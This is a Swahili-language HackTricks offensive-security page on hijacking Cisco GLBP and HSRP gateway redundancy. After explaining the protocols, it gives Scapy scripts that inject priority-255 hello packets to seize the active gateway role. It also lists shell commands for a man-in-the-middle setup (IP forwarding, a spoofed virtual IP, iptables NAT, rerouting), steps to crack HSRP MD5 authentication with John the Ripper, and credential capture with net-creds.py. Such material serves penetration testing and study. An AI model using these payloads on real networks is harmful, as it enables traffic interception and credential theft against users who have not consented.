GLBP & HSRP Mashambulizi

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Muhtasari wa Unyakaji wa FHRP

Uelewa kuhusu FHRP

FHRP imetengenezwa ili kutoa uimara wa mtandao kwa kuunganisha routers nyingi kuwa kitengo kimoja cha virtual, hivyo kuboresha ugawaji wa mzigo na uvumilivu wa hitilafu. Cisco Systems iliizindua protocols maarufu katika kundi hili, kama GLBP na HSRP.

Uelewa wa GLBP Protocol

Uumbaji wa Cisco, GLBP, hufanya kazi kwenye TCP/IP stack, ikitumia UDP kwenye port 3222 kwa mawasiliano. Routers katika kundi la GLBP hubadilishana pakiti za “hello” kila interval ya sekunde 3. Ikiwa router haitumii pakiti hizi kwa muda wa sekunde 10, inachukuliwa kuwa iko offline. Hata hivyo, timers hizi si za kudumu na zinaweza kubadilishwa.

GLBP kwa IPv6 inatumia multicast FF02::66 juu ya UDP/3222, na muundo wa virtual MAC unakuwa 0007.b4xx.xxyy (AVF ID iko kwenye byte ya mwisho). Muda na uso wa shambulio vinabaki vilevile kama katika IPv4, hivyo mbinu za unyakaji bado zinafanya kazi katika mitandao ya dual‑stack.

Uendeshaji wa GLBP na Ugawaji wa Mzigo

GLBP inajitofautisha kwa kuwezesha ugawaji wa mzigo kati ya routers kwa kutumia IP moja ya virtual pamoja na anwani nyingi za virtual MAC. Katika kundi la GLBP, kila router inashiriki katika packet forwarding. Tofauti na HSRP/VRRP, GLBP inatoa kusawazisha mzigo halisi kupitia mbinu kadhaa:

  • Host-Dependent Load Balancing: Inahifadhi mgawanyo thabiti wa anwani ya AVF MAC kwa mwenyeji, muhimu kwa usanidi thabiti wa NAT.
  • Round-Robin Load Balancing: Njia ya default, inayobadilisha mgawanyo wa anwani za AVF MAC miongoni mwa wenyeji wanaoomba.
  • Weighted Round-Robin Load Balancing: Inagawanya mzigo kulingana na vigezo vya “Weight” vilivyowekwa awali.

Vipengele Muhimu na Istilahi za GLBP

  • AVG (Active Virtual Gateway): Router kuu, anayehusika na kugawa anwani za MAC kwa routers wenzao.
  • AVF (Active Virtual Forwarder): Router iliyoteuliwa kudhibiti trafiki ya mtandao.
  • GLBP Priority: Kipimo kinachobainisha AVG, kikianzia kwa default ya 100 na kinaanzia kati ya 1 na 255.
  • GLBP Weight: Kinaonyesha mzigo wa sasa kwenye router, kinachoweza kubadilishwa kwa mkono au kupitia Object Tracking.
  • GLBP Virtual IP Address: Inatumika kama gateway ya default ya mtandao kwa vifaa vyote vilivyounganishwa.

Kwa maingiliano, GLBP inatumia anwani ya multicast iliyohifadhiwa 224.0.0.102 na UDP port 3222. Routers hutuma pakiti za “hello” kila interval ya sekunde 3, na zinachukuliwa kuwa hazifanyi kazi ikiwa pakiti inapotea kwa muda wa sekunde 10.

Mechanism ya Shambulio la GLBP

Mshambuliaji anaweza kuwa router mkuu kwa kutuma pakiti ya GLBP yenye thamani ya priority ya juu zaidi (255). Hii inaweza kusababisha DoS au MITM, ikiruhusu kukamata au kurejelea trafiki.

Unyakaji wa GLBP wa Vitendo na Scapy (short PoC)

from scapy.all import *

vip = "10.10.100.254"          # learned from sniffing
pkt = IP(dst="224.0.0.102")/UDP(dport=3222,sport=3222)/Raw(
b"\x01\x00\xff\x64"      # Version=1, Opcode=Hello, Priority=255, Weight=100
)
send(pkt, iface="eth0", loop=1, inter=1)

Tengeneza bytes za payload ili kuiga GLBP header (version/opcode/priority/weight/VRID). Kuendelea kurudia frame kunahakikisha unashinda uchaguzi wa AVG ikiwa authentication haipo.

Kutekeleza Shambulio la GLBP kwa kutumia Loki

Loki inaweza kufanya shambulio la GLBP kwa kuingiza packet yenye priority na weight zimewekwa kwa 255. Hatua kabla ya shambulio ni kukusanya taarifa kama virtual IP address, kuwepo kwa authentication, na thamani za router priority kwa kutumia zana kama Wireshark.

Hatua za Shambulio:

  1. Badilisha kwa promiscuous mode na wezesha IP forwarding.
  2. Tambua router lengwa na pata IP yake.
  3. Tengeneza Gratuitous ARP.
  4. Ingiza packet ya GLBP yenye madhara, ukiiga AVG.
  5. Toa anwani ya IP sekondari kwa interface ya mshambuliaji, ikilingana na GLBP virtual IP.
  6. Tekeleza SNAT ili kuona trafiki yote kwa ukamilifu.
  7. Rekebisha routing ili kuhakikisha ufikaji wa intaneti unaendelea kupitia router ya asili ya AVG.

Kwa kufuata hatua hizi, mshambuliaji anajipanga kuwa “man in the middle,” akiweza kukamata na kuchambua trafiki ya mtandao, pamoja na data zisizofichwa au zenye nyeti.

Kwa maonyesho, hapa kuna snippet za amri zinazohitajika:

# Enable promiscuous mode and IP forwarding
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1

# Configure secondary IP and SNAT
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

# Adjust routing
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100

Kufuatilia na kukamata trafiki inaweza kufanywa kwa kutumia net-creds.py au zana zinazofanana ili kukamata na kuchambua data inayosogea kupitia network iliyodukuliwa.

Ufafanuzi wa Kimya kuhusu Utekaji wa HSRP pamoja na Maelezo ya Amri

Muhtasari wa HSRP (Hot Standby Router/Redundancy Protocol)

HSRP ni protocol miliki ya Cisco iliyoundwa kwa ajili ya redundancy ya gateway ya network. Inaruhusu usanidi wa routers kadhaa za kimwili kuwa kitengo kimoja cha kimantiki chenye anwani ya IP ya pamoja. Kitengo hiki cha kimantiki kinasimamiwa na router kuu inayehusika na kuelekeza trafiki. Tofauti na GLBP, inayotumia vipimo kama priority na weight kwa load balancing, HSRP inategemea router moja active kwa usimamizi wa trafiki.

HSRPv1 inatumia multicast 224.0.0.2 na virtual MAC 0000.0c07.acXX; HSRPv2 na HSRPv2 ya IPv6 inatumia 224.0.0.102 / FF02::66 na virtual MAC 0000.0c9f.fXXX. UDP destination port ni 1985 kwa IPv4 na 2029 kwa IPv6.

Majukumu na Terminolojia katika HSRP

  • HSRP Active Router: Kifaa kinachofanya kazi kama gateway, kinachosimamia mtiririko wa trafiki.
  • HSRP Standby Router: Router mbadala, tayari kuchukua nafasi ikiwa active router itashindwa.
  • HSRP Group: Seti ya routers zinazoshirikiana kuunda router moja ya kimantiki yenye ustahimilivu.
  • HSRP MAC Address: Anwani ya MAC ya kimantiki iliyotengwa kwa router wa kimantiki katika setup ya HSRP.
  • HSRP Virtual IP Address: Anwani ya IP ya kimantiki ya HSRP group, inayofanya kazi kama default gateway kwa vifaa vilivyohusishwa.

Matoleo ya HSRP

HSRP inakuja katika matoleo mawili, HSRPv1 na HSRPv2, tofauti hasa kwa uwezo wa kundi, matumizi ya multicast IP, na muundo wa anwani ya MAC ya kimantiki. Protocol inatumia anwani maalum za multicast IP kwa kubadilishana taarifa za huduma, huku packets za Hello zikitumwa kila sekunde 3. Router inachukuliwa kuwa haitumiki ikiwa hakuna packet inayopokelewa ndani ya interval ya sekunde 10.

Mbinu ya Shambulio la HSRP

Mashambulizi ya HSRP yanahusisha kuchukua kwa nguvu nafasi ya Active Router kwa kufyonza thamani ya kipaumbele ya juu kabisa (maximum priority). Hii inaweza kusababisha shambulio la Man-In-The-Middle (MITM). Hatua muhimu kabla ya shambulio ni kukusanya data kuhusu setup ya HSRP, ambayo inaweza kufanywa kwa kutumia Wireshark kwa uchambuzi wa trafiki.

Uchukuzi wa Haraka wa HSRP kwa kutumia Scapy

from scapy.all import *

vip = "10.10.100.1"
pkt = IP(dst="224.0.0.102")/UDP(sport=1985,dport=1985)/Raw(
b"\x00\x02\xff\x03\x00\x00\x00\x01"  # Hello, priority 255, group 1
)
send(pkt, iface="eth0", inter=1, loop=1)

Ikiwa uthibitishaji haujasanidiwa, kutuma hellos kwa mfululizo kwa kipaumbele cha juu kunalazimisha wenzao kuingia katika hali za Speak/Listen na kukuwezesha kuwa Active, ukielekeza trafiki kupitia mwenyeji wako.

HSRP authentication corner cases

  • Legacy plain-text auth inauzwa kwa urahisi (spoofable).
  • MD5 authentication inapiga tu payload ya HSRP; vifurushi vilivyotengenezwa vinaweza bado kupunguza/DoS control planes. Toleo za NX-OS hapo awali ziliruhusu DoS dhidi ya vikundi vilivyo na uthibitishaji (angalia Cisco advisory CSCup11309).
  • Kwenye VLAN za kushirikiwa za ISP / VPS nyingi, HSRPv1 multicasts zinaonekana kwa tenants; bila auth unaweza kujiunga na kupreempt trafiki.

Hatua za Kupitisha Uthibitishaji wa HSRP

  1. Hifadhi trafiki ya mtandao yenye data ya HSRP kama faili .pcap.
tcpdump -w hsrp_traffic.pcap
  1. Chukua MD5 hashes kutoka kwa faili .pcap ukitumia hsrp2john.py.
python2 hsrp2john.py hsrp_traffic.pcap > hsrp_hashes
  1. Gonga MD5 hashes ukitumia John the Ripper.
john --wordlist=mywordlist.txt hsrp_hashes

Executing HSRP Injection with Loki

  1. Anzisha Loki ili kutambua matangazo ya HSRP.
  2. Weka interface ya mtandao katika promiscuous mode na wezesha IP forwarding.
sudo ip link set eth0 promisc on
sudo sysctl -w net.ipv4.ip_forward=1
  1. Tumia Loki kulenga router maalum, ingiza password ya HSRP uliyoigonga, na fanya usanidi unaohitajika kuigiza Active Router.
  2. Baada ya kupata nafasi ya Active Router, sanidi interface yako ya mtandao na iptables ili kunasa trafiki halali.
sudo ifconfig eth0:1 10.10.100.254 netmask 255.255.255.0
sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
  1. Badilisha routing table ili kuelekeza trafiki kupitia former Active Router.
sudo route del default
sudo route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.10.100.100
  1. Tumia net-creds.py au utiliti sawa kunasa credentials kutoka kwa trafiki uliyonaswa.
sudo python2 net-creds.py -i eth0

Kutekeleza hatua hizi kunamweka mshambuliaji katika nafasi ya kunasa na kubadilisha trafiki, sawa na utaratibu wa GLBP hijacking. Hii inaonyesha udhaifu katika protokoli za urudufu kama HSRP na haja ya hatua thabiti za usalama.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks